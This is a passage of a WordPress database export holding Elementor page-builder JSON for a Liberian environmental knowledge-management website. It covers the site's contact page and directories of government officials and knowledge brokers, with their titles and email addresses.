settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23045,3327,'_elementor_edit_mode','builder'),(23046,3327,'_elementor_template_type','wp-page'),(23047,3327,'_elementor_version','3.0.16'),(23048,3327,'_wp_page_template','default'),(23049,3327,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br 